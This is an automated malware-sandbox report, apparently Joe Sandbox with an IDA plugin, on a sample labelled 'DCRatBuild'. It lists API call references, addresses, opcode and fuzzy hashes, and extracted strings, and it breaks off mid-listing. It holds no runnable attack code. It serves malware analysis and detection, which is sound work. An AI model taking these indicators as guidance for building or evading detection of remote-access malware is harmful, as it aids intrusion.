                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: f56d0e0bdfb28a8b8a76763641d67d84c85bfb11b2575450d04cb32f5cf08be6
                      • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                      • Opcode Fuzzy Hash: f56d0e0bdfb28a8b8a76763641d67d84c85bfb11b2575450d04cb32f5cf08be6
                      • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: faf720d5f6dec265e0b7b04c862e9e990cd10ed3e307133750fcdc2f363440f9
                      • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                      • Opcode Fuzzy Hash: faf720d5f6dec265e0b7b04c862e9e990cd10ed3e307133750fcdc2f363440f9
                      • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 6eb03a8f1a15fc6dacb98d26da816a242bfa4af5d237fef015f0f52d4baeacec
                      • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                      • Opcode Fuzzy Hash: 6eb03a8f1a15fc6dacb98d26da816a242bfa4af5d237fef015f0f52d4baeacec
                      • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: c35fd1e22c275ec1c70660fcde8ab73f9c6f39ed66feb0e4a3e44d55fa9121db
                      • Instruction ID: c86d836922df9aefbc7272a78cf5fb7050dc04edf516b90c24bd539397434eb7
                      • Opcode Fuzzy Hash: c35fd1e22c275ec1c70660fcde8ab73f9c6f39ed66feb0e4a3e44d55fa9121db
                      • Instruction Fuzzy Hash: 3FA001A62AD5427C3648B252BE17D3A626EEDE0B22331C61FF44FA4089B99898495871
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 6e9445d7c14bd4694a576f09e597403ae79e3a8c2c7e312bb5b6a816962cc16d
                      • Instruction ID: 756f11e2614d29acfbd3bdd2d121d123fcb9c9246b1902b4a975ccecbc0e88c5
                      • Opcode Fuzzy Hash: 6e9445d7c14bd4694a576f09e597403ae79e3a8c2c7e312bb5b6a816962cc16d
                      • Instruction Fuzzy Hash: E3A011AA2AC002BC320822003E0BC3A223ECCC0B20332C80FF00F80080BA808C088030
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DC36
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: d4f5c3605a2abceadab8a3fce1f7a77e089bec96884387fc6160ea05dd26eda4
                      • Instruction ID: 28a459b9f2ae1a7ea9180c775af80d0dbea568ceb68a0be06f6a4f5d98dc951b
                      • Opcode Fuzzy Hash: d4f5c3605a2abceadab8a3fce1f7a77e089bec96884387fc6160ea05dd26eda4
                      • Instruction Fuzzy Hash: 4FA001AA6AD242BD360D62517E17D7A623ECCC8B61335C91EF54FA4095BA80AC499431
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DC36
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 5de647e9cff412ea570b7e863885aa4ca6820cf663a1eda950b05da65c465485
                      • Instruction ID: 28a459b9f2ae1a7ea9180c775af80d0dbea568ceb68a0be06f6a4f5d98dc951b
                      • Opcode Fuzzy Hash: 5de647e9cff412ea570b7e863885aa4ca6820cf663a1eda950b05da65c465485
                      • Instruction Fuzzy Hash: 4FA001AA6AD242BD360D62517E17D7A623ECCC8B61335C91EF54FA4095BA80AC499431
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 813955f0469fc2b4a24177dbfa7fa89412b55bd961709e5e15bba3e01a56269b
                      • Instruction ID: 756f11e2614d29acfbd3bdd2d121d123fcb9c9246b1902b4a975ccecbc0e88c5
                      • Opcode Fuzzy Hash: 813955f0469fc2b4a24177dbfa7fa89412b55bd961709e5e15bba3e01a56269b
                      • Instruction Fuzzy Hash: E3A011AA2AC002BC320822003E0BC3A223ECCC0B20332C80FF00F80080BA808C088030
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: c6c5ea55a16342289fd238fd73ad6db2d79998c5d5e255509b14990d1a3d7679
                      • Instruction ID: 756f11e2614d29acfbd3bdd2d121d123fcb9c9246b1902b4a975ccecbc0e88c5
                      • Opcode Fuzzy Hash: c6c5ea55a16342289fd238fd73ad6db2d79998c5d5e255509b14990d1a3d7679
                      • Instruction Fuzzy Hash: E3A011AA2AC002BC320822003E0BC3A223ECCC0B20332C80FF00F80080BA808C088030
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 92b3299889a9e28d25bf0931f87ab6960e8987780b6219144b8390bba16e929d
                      • Instruction ID: 756f11e2614d29acfbd3bdd2d121d123fcb9c9246b1902b4a975ccecbc0e88c5
                      • Opcode Fuzzy Hash: 92b3299889a9e28d25bf0931f87ab6960e8987780b6219144b8390bba16e929d
                      • Instruction Fuzzy Hash: E3A011AA2AC002BC320822003E0BC3A223ECCC0B20332C80FF00F80080BA808C088030
                      APIs
                      • SetCurrentDirectoryW.KERNELBASE(?,00D7A587,C:\Users\user\Desktop,00000000,00DA946A,00000006), ref: 00D7A326
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CurrentDirectory
                      • String ID:
                      • API String ID: 1611563598-0
                      • Opcode ID: 20b690ca146bf4cf4fd8a3f705cdc35ae1d5082efb6f0a682f16e15761927db4
                      • Instruction ID: 8a08b5a57d564e8500a5b26abe9b2534fb3e2802d2375116c05d40432ab9bc58
                      • Opcode Fuzzy Hash: 20b690ca146bf4cf4fd8a3f705cdc35ae1d5082efb6f0a682f16e15761927db4
                      • Instruction Fuzzy Hash: 55A01230194206568A000B30CC09C1576505760702F0086227002C00B0CB308C14A510
                      APIs
                      • CloseHandle.KERNELBASE(000000FF,?,?,00D6968F,?,?,?,?,00D91FA1,000000FF), ref: 00D696EB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CloseHandle
                      • String ID:
                      • API String ID: 2962429428-0
                      • Opcode ID: d4fd659a13ee350ec230100b643c7ac06fa6d95edbc57fcd1cab0298b1949fc8
                      • Instruction ID: 6d5e3ad7efe4f4cf3ccb276a0eeef45a40e407189d28ec4767f0450737f96953
                      • Opcode Fuzzy Hash: d4fd659a13ee350ec230100b643c7ac06fa6d95edbc57fcd1cab0298b1949fc8
                      • Instruction Fuzzy Hash: 6DF05E30556B048FDB308A64D569792B7E89B12735F088B1E90EB535A4D771A84D8B20
                      APIs
                        • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                        • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00D7B971
                      • EndDialog.USER32(?,00000006), ref: 00D7B984
                      • GetDlgItem.USER32(?,0000006C), ref: 00D7B9A0
                      • SetFocus.USER32(00000000), ref: 00D7B9A7
                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 00D7B9E1
                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00D7BA18
                      • FindFirstFileW.KERNEL32(?,?), ref: 00D7BA2E
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D7BA4C
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D7BA5C
                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D7BA78
                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D7BA94
                      • _swprintf.LIBCMT ref: 00D7BAC4
                        • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00D7BAD7
                      • FindClose.KERNEL32(00000000), ref: 00D7BADE
                      • _swprintf.LIBCMT ref: 00D7BB37
                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 00D7BB4A
                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00D7BB67
                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00D7BB87
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D7BB97
                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D7BBB1
                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D7BBC9
                      • _swprintf.LIBCMT ref: 00D7BBF5
                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00D7BC08
                      • _swprintf.LIBCMT ref: 00D7BC5C
                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 00D7BC6F
                        • Part of subcall function 00D7A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D7A662
                        • Part of subcall function 00D7A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00D9E600,?,?), ref: 00D7A6B1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                      • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                      • API String ID: 797121971-1840816070
                      • Opcode ID: 9c3872564e99103d4acf27ffa6169011c86a9e8a4cd12da44ec5e882c62d2a3f
                      • Instruction ID: 749702fae427d4f4c53517beb40b0c9db68c984970534c8cbbfe34097b30b4ea
                      • Opcode Fuzzy Hash: 9c3872564e99103d4acf27ffa6169011c86a9e8a4cd12da44ec5e882c62d2a3f
                      • Instruction Fuzzy Hash: A5919372248349BFD7219BA0DC49FFB77ACEB49714F04481AF789D2191EB719A048B72
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D67191
                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00D672F1
                      • CloseHandle.KERNEL32(00000000), ref: 00D67301
                        • Part of subcall function 00D67BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D67C04
                        • Part of subcall function 00D67BF5: GetLastError.KERNEL32 ref: 00D67C4A
                        • Part of subcall function 00D67BF5: CloseHandle.KERNEL32(?), ref: 00D67C59
                      • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00D6730C
                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00D6741A
                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00D67446
                      • CloseHandle.KERNEL32(?), ref: 00D67457
                      • GetLastError.KERNEL32 ref: 00D67467
                      • RemoveDirectoryW.KERNEL32(?), ref: 00D674B3
                      • DeleteFileW.KERNEL32(?), ref: 00D674DB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                      • API String ID: 3935142422-3508440684
                      • Opcode ID: 77e66f75d1d2bbb09f94d2013e1db362334ef9c3903aba1d7d7d2b77eb27f157
                      • Instruction ID: 7b579a0730a4de2533f4f96ec41e2eb9d2571d8990716da809bcf73dc630a82a
                      • Opcode Fuzzy Hash: 77e66f75d1d2bbb09f94d2013e1db362334ef9c3903aba1d7d7d2b77eb27f157
                      • Instruction Fuzzy Hash: 3BB1C271904219ABDF20DFA4DC45BEEBBB8EF04704F0445A9F949E7242DB34AA49CB71
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: H_prolog_memcmp
                      • String ID: CMT$h%u$hc%u
                      • API String ID: 3004599000-3282847064
                      • Opcode ID: d9aff0505aea46dafe57306f1d70c26eb16ca2ea68985ec2792dbdc308dbd3a2
                      • Instruction ID: d774385f8733c048206ac937f1803f88f5de1216fc1bc6ade564f34ec8fed213
                      • Opcode Fuzzy Hash: d9aff0505aea46dafe57306f1d70c26eb16ca2ea68985ec2792dbdc308dbd3a2
                      • Instruction Fuzzy Hash: 74328E715147849FDF14DF64C896AEA37A5EF55300F08457EFD8A8B282EB70AA48CB70
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: 87f9838cb50a149a67c4edb36208da15769dae42bedaf743474213a4a421efef
                      • Instruction ID: d70630221f55ae431ec6e807abb848c15090aa03b7b82adb908d4e09870a342c
                      • Opcode Fuzzy Hash: 87f9838cb50a149a67c4edb36208da15769dae42bedaf743474213a4a421efef
                      • Instruction Fuzzy Hash: B3C25C71E086288FDB25EF28DD407E9B3B6EB44315F1945EAD44DE7280E774AE818F60
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D627F1
                      • _strlen.LIBCMT ref: 00D62D7F
